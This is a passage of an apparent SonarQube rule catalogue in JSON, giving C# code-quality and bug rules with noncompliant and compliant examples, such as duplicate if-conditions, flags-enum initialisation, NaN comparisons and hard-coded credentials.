keystrokes. Similarly, explicitly\ninvoking <code>ToString()<\/code> when the compiler would do it implicitly is also needless code-bloat.<\/p>\n<p>This rule raises an issue when <code>ToString()<\/code> is invoked:<\/p>\n<ul>\n <li> on a <code>string<\/code> <\/li>\n <li> on a non-<code>string<\/code> operand to concatenation <\/li>\n <li> on an argument to <code>string.Format<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar s = \"foo\";\nvar t = \"fee fie foe \" + s.ToString(); \/\/ Noncompliant\nvar someObject = new object();\nvar u = \"\" + someObject.ToString(); \/\/ Noncompliant\nvar v = string.Format(\"{0}\", someObject.ToString()); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar s = \"foo\";\nvar t = \"fee fie foe \" + s;\nvar someObject = new object();\nvar u = \"\" + someObject;\nvar v = string.Format(\"{0}\", someObject);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The rule does not report on value types, where leaving off the <code>ToString()<\/code> call would result in automatic boxing.<\/p>\n<pre>\nvar v = string.Format(\"{0}\", 1.ToString());\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1862","repo":"csharpsquid","name":"Related \"if\/else if\" statements should not have the same condition","htmlDesc":"<p>A chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will be executed: the first\none with a condition that evaluates to <code>true<\/code>. <\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (param == 1)\n{\n OpenWindow();\n}\nelse if (param == 2)\n{\n CloseWindow();\n}\nelse if (param == 1) \/\/ Noncompliant\n{\n MoveWindowToTheBackground();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (param == 1)\n{\n OpenWindow();\n}\nelse if (param == 2)\n{\n CloseWindow();\n}\nelse if (param == 3)\n{\n MoveWindowToTheBackground();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1871","repo":"csharpsquid","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i)\n{\n case 1:\n DoSomething();\n break;\n case 2:\n DoSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n DoSomething();\n break;\n default:\n DoTheRest();\n}\n\nif (a >= 0 && a < 10)\n{\n DoTheThing();\n}\nelse if (a >= 10 && a < 20)\n{\n DoTheOtherThing();\n}\nelse if (a >= 20 && a < 50)\n{\n DoTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse\n{\n DoTheRest();\n}\n\nif (b == 0)\n{\n DoOneMoreThing();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n case 1:\n case 3:\n DoSomething();\n break;\n case 2:\n DoSomethingDifferent();\n break;\n default:\n DoTheRest();\n}\n\nif ((a >= 0 && a < 10) || (a >= 20 && a < 50))\n{\n DoTheThing();\n}\nelse if (a >= 10 && a < 20)\n{\n DoTheOtherThing();\n}\nelse\n{\n DoTheRest();\n}\n\nDoOneMoreThing();\n<\/pre>\n<p>or<\/p>\n<pre>\nswitch (i)\n{\n case 1:\n DoSomething();\n break;\n case 2:\n DoSomethingDifferent();\n break;\n case 3:\n DoThirdThing();\n break;\n default:\n DoTheRest();\n}\n\nif (a >= 0 && a < 10)\n{\n DoTheThing();\n}\nelse if (a >= 10 && a < 20)\n{\n DoTheOtherThing();\n}\nelse if (a >= 20 && a < 50)\n{\n DoTheThirdThing();\n}\nelse\n{\n DoTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following <code>break<\/code>.<\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1940","repo":"csharpsquid","name":"Boolean checks should not be inverted","htmlDesc":"<p>It is needlessly complex to invert the result of a boolean comparison. The opposite comparison should be made instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( !(a == 2)) { ...} \/\/ Noncompliant\nbool b = !(i < 10); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a != 2) { ...}\nbool b = (i >= 10);\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1994","repo":"csharpsquid","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i < 10; j++) \/\/ Noncompliant\n{\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i < 10; i++)\n{\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2068","repo":"csharpsquid","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring username = \"admin\";\nstring password = \"Password123\"; \/\/ Noncompliant\nstring usernamePassword = \"user=admin&password=Password123\"; \/\/ Noncompliant\nstring usernamePassword2 = \"user=admin&\" + \"password=\" + password; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstring username = \"admin\";\nstring password = GetEncryptedPassword();\nstring usernamePassword = string.Format(\"user={0}&password={1}\", GetEncryptedUsername(), GetEncryptedPassword());\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n Broken Authentication and Session Management <\/li>\n <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"VULNERABILITY"},{"key":"csharpsquid:S2197","repo":"csharpsquid","name":"Modulus results should not be checked for direct equality","htmlDesc":"<p>When the modulus of a negative number is calculated, the result will either be negative or zero. Thus, comparing the modulus of a variable for\nequality with a positive number (or a negative one) could result in unexpected results. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic bool IsOdd(int x)\n{\n return x % 2 == 1; \/\/ Noncompliant; if x is an odd negative, x % 2 == -1\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic bool IsOdd(int x)\n{\n return x %2 != 0;\n}\n<\/pre>\n<p>or<\/p>\n<pre>\npublic bool IsOdd(uint x)\n{\n return x %2 == 1;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/xAHAAQ\">CERT, NUM51-J.<\/a> - Do not assume that the remainder operator always returns a\n nonnegative result for integral operands <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NQBi\">CERT, INT10-C<\/a> - Do not assume a positive remainder when using the % operator\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/_YBLAQ\">CERT, INT10-CPP.<\/a> - Do not assume a positive remainder when using the %\n operator <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2201","repo":"csharpsquid","name":"Return values from functions without side effects should not be ignored","htmlDesc":"<p>When the call to a function doesn't have any side effects, what is the point of making the call if the results are ignored? In such case, either\nthe function call is useless and should be dropped or the source code doesn't behave as expected.<\/p>\n<p>This rule raises an issue when the results of the following methods are ignored:<\/p>\n<ul>\n <li> LINQ method, <\/li>\n <li> <code>[Pure]<\/code> method, <\/li>\n <li> any method on <code>string<\/code>, <code>int<\/code>, ..., <code>System.Collections.Immutable.ImmutableArray<T><\/code>,\n <code>ImmutableHashSet<T><\/code>, ... <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ncoll.Where(i => i > 5).Select(i => i*i); \/\/ Noncompliant\n\"this string\".Equals(\"other string\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar res = coll.Where(i => i > 5).Select(i => i*i);\nvar isEqual = \"this string\".Equals(\"other string\");\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule doesn't report issues on method calls with <code>out<\/code> or <code>ref<\/code> arguments.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2012, 17.7 - The value returned by a function having non-void return type shall be used <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/9YIRAQ\">CERT, EXP12-C.<\/a> - Do not ignore values returned by functions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/eoAyAQ\">CERT, EXP12-CPP.<\/a> - Do not ignore values returned by functions or methods\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/9gEqAQ\">CERT, EXP00-J.<\/a> - Do not ignore values returned by methods <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2225","repo":"csharpsquid","name":"\"ToString()\" method should not return null","htmlDesc":"<p>Calling <code>ToString()<\/code> on an object should always return a string. Returning <code>null<\/code> instead contravenes the method's implicit\ncontract.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic override string ToString ()\n{\n if (this.collection.Count == 0)\n {\n return null; \/\/ Noncompliant\n }\n else\n {\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic override string ToString ()\n{\n if (this.collection.Count == 0)\n {\n return string.Empty;\n }\n else\n {\n \/\/ ...\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/476.html\">MITRE CWE-476<\/a> - NULL Pointer Dereference <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2228","repo":"csharpsquid","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate void DoSomething ()\n{\n \/\/ ...\n Console.WriteLine (\"so far, so good...\"); \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"VULNERABILITY"},{"key":"csharpsquid:S2325","repo":"csharpsquid","name":"Methods and properties that don't access instance data should be static","htmlDesc":"<p>Class methods and properties that don't access instance data can be <code>static<\/code> to prevent any misunderstanding about the contract of the\nmethod. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Utilities\n{\n public int MagicNum \/\/ Noncompliant\n {\n get\n {\n return 42;\n }\n }\n\n private static string magicWord = \"please\";\n public string MagicWord \/\/ Noncompliant\n {\n get\n {\n return magicWord;\n }\n set\n {\n magicWord = value;\n }\n }\n\n public int Sum(int a, int b) \/\/ Noncompliant\n {\n return a + b;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Utilities\n{\n public static int MagicNum\n {\n get\n {\n return 42;\n }\n }\n\n private static string magicWord = \"please\";\n public static string MagicWord\n {\n get\n {\n return magicWord;\n }\n set\n {\n magicWord = value;\n }\n }\n\n public static int Sum(int a, int b)\n {\n return a + b;\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2342","repo":"csharpsquid","name":"Enumeration types should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all <code>enum<\/code> names match a provided regular\nexpression.<\/p>\n<p>The default configuration is the one recommended by Microsoft:<\/p>\n<ul>\n <li> Pascal casing, starting with an upper case character, e.g. BackColor <\/li>\n <li> Short abbreviations of 2 letters can be capitalized, e.g. GetID <\/li>\n <li> Longer abbreviations need to be lower case, e.g. GetHtml <\/li>\n <li> If the enum is marked as [Flags] then its name should be plural (e.g. MyOptions), otherwise, names should be singular (e.g. MyOption) <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression for non-flags enums: <code>^([A-Z]{1,3}[a-z0-9]+)*([A-Z]{2})?$<\/code><\/p>\n<pre>\npublic enum foo \/\/ Noncompliant\n{\n FooValue = 0\n}\n<\/pre>\n<p>With the default regular expression for flags enums: <code>^([A-Z]{1,3}[a-z0-9]+)*([A-Z]{2})?s$<\/code><\/p>\n<pre>\n[Flags]\npublic enum Option \/\/ Noncompliant\n{\n None = 0,\n Option1 = 1,\n Option2 = 2\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic enum Foo\n{\n FooValue = 0\n}\n<\/pre>\n<pre>\n[Flags]\npublic enum Options\n{\n None = 0,\n Option1 = 1,\n Option2 = 2\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[{"key":"format","htmlDesc":"Regular expression used to check the enumeration type names against.","defaultValue":"^([A-Z]{1,3}[a-z0-9]+)*([A-Z]{2})?$","type":"STRING"},{"key":"flagsAttributeFormat","htmlDesc":"Regular expression used to check the flags enumeration type names against.","defaultValue":"^([A-Z]{1,3}[a-z0-9]+)*([A-Z]{2})?s$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S2345","repo":"csharpsquid","name":"Flags enumerations should explicitly initialize all their members","htmlDesc":"<p>Flags enumerations should not rely on the language to initialize the values of their members. Implicit initialization will set the first member to\n0, and increment the value by one for each subsequent member. This implicit behavior does not allow members to be combined using the bitwise or\noperator in a useful way.<\/p>\n<p>Instead, 0 and powers of two (i.e. 1, 2, 4, 8, 16, ...) should be used to explicitly initialize all the members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n[Flags]\nenum FruitType \/\/ Noncompliant\n{\n None,\n Banana,\n Orange,\n Strawberry\n}\nclass Program\n{\n static void Main()\n {\n var bananaAndStrawberry = FruitType.Banana | FruitType.Strawberry;\n \/\/ Will display only Strawberry!\n Console.WriteLine(bananaAndStrawberry.ToString());\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n[Flags]\nenum FruitType\n{\n None = 0,\n Banana = 1,\n Orange = 2,\n Strawberry = 4\n}\nclass Program\n{\n static void Main()\n {\n var bananaAndStrawberry = FruitType.Banana | FruitType.Strawberry;\n \/\/ Will display Banana and Strawberry, as expected.\n Console.WriteLine(bananaAndStrawberry.ToString());\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The default initialization of 0, 1, 2, 3, 4, ... matches 0, 1, 2, 4, 8 ... in the first three values, so no issue is reported if the first three\nmembers of the enumeration is not initialized.<\/p>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2346","repo":"csharpsquid","name":"Flags enumerations zero-value members should be named \"None\"","htmlDesc":"<p>Consisitent use of \"None\" in flags enumerations indicates that all flag values are cleared. The value 0 should not be used to indicate any other\nstate, since there is no way to check that the bit <code>0<\/code> is set.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n[Flags]\nenum FruitType\n{\n Void = 0, \/\/ Non-Compliant\n Banana = 1,\n Orange = 2,\n Strawberry = 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n[Flags]\nenum FruitType\n{\n None = 0, \/\/ Compliant\n Banana = 1,\n Orange = 2,\n Strawberry = 4\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2365","repo":"csharpsquid","name":"Properties should not make collection or array copies","htmlDesc":"<p>Most developers expect property access to be as efficient as field access. However, if a property returns a copy of an array or collection, it will\nbe much slower than a simple field access, contrary to the caller's likely expectations. Therefore, such properties should be refactored into methods\nso that callers are not surprised by unexpectedly poor performance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate List<string> _foo = new List<string> { \"a\", \"b\", \"c\" };\npublic IEnumerable<string> Foo \/\/ Noncompliant\n{\n get\n {\n return _foo.ToList();\n }\n}\n\nprivate string[] _bar = new string[] { \"a\", \"b\", \"c\" };\npublic IEnumerable<string> Bar \/\/ Noncompliant\n{\n get\n {\n return (string[])_bar.Clone();\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprivate List<string> _foo = new List<string> { \"a\", \"b\", \"c\" };\nprivate string[] _bar = new string[] { \"a\", \"b\", \"c\" };\n\npublic IEnumerable<string> GetFoo()\n{\n return _foo.ToList();\n}\n\npublic IEnumerable<string> GetBar()\n{\n return (string[])_bar.Clone();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2376","repo":"csharpsquid","name":"Write-only properties should not be used","htmlDesc":"<p>Properties with only setters are confusing and counterintuitive. Instead, a property getter should be added if possible, or the property should be\nreplaced with a setter method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Program\n{\n public int Foo \/\/Non-Compliant\n {\n set\n {\n \/\/ ... some code ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Program\n{\n private int foo;\n\n public void SetFoo(int value)\n {\n \/\/ ... some code ...\n foo = value;\n }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Program\n{\n public int Foo { get; set; } \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2436","repo":"csharpsquid","name":"Classes and methods should not have too many generic parameters","htmlDesc":"<p>A method or class with too many type parameters has likely aggregated too many responsibilities and should be split.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default parameter value of 2:<\/p>\n<pre>\n<S, T, U, V> void foo() {} \/\/ Noncompliant; not really readable\n<String, Integer, Object, String>foo(); \/\/ especially on invocations\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[{"key":"max","htmlDesc":"Maximum authorized number of generic parameters.","defaultValue":"2","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S2486","repo":"csharpsquid","name":"Generic exceptions should not be ignored","htmlDesc":"<p>When exceptions occur, it is usually a bad idea to simply ignore them. Instead, it is better to handle them properly, or at least to log them.<\/p>\n<p>This rule only reports on empty catch clauses that catch generic <code>Exception<\/code>s.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring text = \"\";\ntry\n{\n text = File.ReadAllText(fileName);\n}\ncatch (Exception exc) \/\/ Noncompliant\n{\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstring text = \"\";\ntry\n{\n text = File.ReadAllText(fileName);\n}\ncatch (Exception exc)\n{\n logger.Log(exc);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, it is not considered to be empty.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/391.html\">MITRE, CWE-391<\/a> - Unchecked Error Condition <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2589","repo":"csharpsquid","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) \/\/ Noncompliant\n{\n DoSomething();\n}\n\nif (b && a) \/\/ Noncompliant; \"a\" is always \"true\"\n{\n DoSomething();\n}\n\nif (c || !a) \/\/ Noncompliant; \"!a\" is always \"false\"\n{\n DoSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (Foo(a))\n{\n DoSomething();\n}\n\nif (b)\n{\n DoSomething();\n}\n\nif (c)\n{\n DoSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2688","repo":"csharpsquid","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = double.NaN;\n\nif (a == double.NaN) \/\/ Noncompliant; always false\n{\n Console.WriteLine(\"a is not a number\"); \/\/ this is dead code\n}\nif (a != double.NaN) \/\/ Noncompliant; always true\n{\n Console.WriteLine(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (double.IsNaN(a))\n{\n console.log(\"a is not a number\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2692","repo":"csharpsquid","name":"\"IndexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>IndexOf<\/code> value compare it with -1 because 0 is a valid index. Any checks which look for values\n<code>>0<\/code> ignore the first element, which is likely a bug. If the intent is merely to check inclusion of a value in a <code>string<\/code>,\n<code>List<\/code>, or an array, consider using the <code>Contains<\/code> method instead.<\/p>\n<p>This rule raises an issue when an <code>IndexOf<\/code> value retrieved from a <code>string<\/code>, <code>List<\/code>, or array is tested against\n<code>>0<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring color = \"blue\";\nstring name = \"ishmael\";\n\nList<string> strings = new List<string>();\nstrings.Add(color);\nstrings.Add(name);\nstring[] stringArray = strings.ToArray();\n\nif (strings.IndexOf(color) > 0) \/\/ Noncompliant\n{\n \/\/ ...\n}\nif (name.IndexOf(\"ish\") > 0) \/\/ Noncompliant\n{\n \/\/ ...\n}\nif (name.IndexOf(\"ae\") > 0) \/\/ Noncompliant\n{\n \/\/ ...\n}\nif (Array.IndexOf(stringArray, color) > 0) \/\/ Noncompliant\n{\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstring color = \"blue\";\nstring name = \"ishmael\";\n\nList<string> strings = new List<string> ();\nstrings.Add(color);\nstrings.Add(name);\nstring[] stringArray = strings.ToArray();\n\nif (strings.IndexOf(color) > -1)\n{\n \/\/ ...\n}\nif (name.IndexOf(\"ish\") >= 0)\n{\n \/\/ ...\n}\nif (name.Contains(\"ae\"))\n{\n \/\/ ...\n}\nif (Array.IndexOf(stringArray, color) >= 0)\n{\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2696","repo":"csharpsquid","name":"Instance members should not write to \"static\" fields","htmlDesc":"<p>Correctly updating a <code>static<\/code> field from a non-static method is tricky to get right and could easily lead to bugs if there are multiple\nclass instances and\/or multiple threads in play. <\/p>\n<p>This rule raises an issue each time a <code>static<\/code> field is updated from a non-static method or property.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class MyClass\n{\n private static int count = 0;\n\n public void DoSomething()\n {\n \/\/...\n count++; \/\/ Noncompliant\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2757","repo":"csharpsquid","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs ( <code>=+<\/code>, <code>=-<\/code> or <code>=\\!<\/code> ) where the reversed, single operator was meant (<code>+=<\/code>,\n<code>-=<\/code> or <code>\\!=<\/code>) will compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code>, <code>=-<\/code>, or <code>=!<\/code> is used without any spacing between the two operators and when\nthere is at least one whitespace character after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nint target = -5;\nint num = 3;\n\ntarget =- num; \/\/ Noncompliant; target = -3. Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nint target = -5;\nint num = 3;\n\ntarget = -num; \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2760","repo":"csharpsquid","name":"Sequential tests should not check the same condition","htmlDesc":"<p>When the same condition is checked twice in a row, it is either confusing - why have separate checks? - or an error - some other condition should\nhave been checked in the second test.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (a == b)\n{\n doTheThing(b);\n}\nif (a == b) \/\/ Noncompliant; is this really what was intended?\n{\n doTheThing(c);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a == b)\n{\n doTheThing(b);\n doTheThing(c);\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nif (a == b)\n{\n doTheThing(b);\n}\nif (b == c)\n{\n doTheThing(c);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Since it is a common pattern to test a variable, reassign it if it fails the test, then re-test it, that pattern is ignored.<\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2933","repo":"csharpsquid","name":"Fields that are only assigned in the constructor should be \"readonly\"","htmlDesc":"<p><code>readonly<\/code> fields can only be assigned in a class constructor. If a class has a field that's not marked <code>readonly<\/code> but is\nonly set in the constructor, it could cause confusion about the field's intended use. To avoid confusion, such fields should be marked\n<code>readonly<\/code> to make their intended use explicit, and to prevent future maintainers from inadvertently changing their use.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Person\n{\n int _birthYear; \/\/ Noncompliant\n Person(int birthYear)\n {\n _birthYear = birthYear;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Person\n{\n readonly int 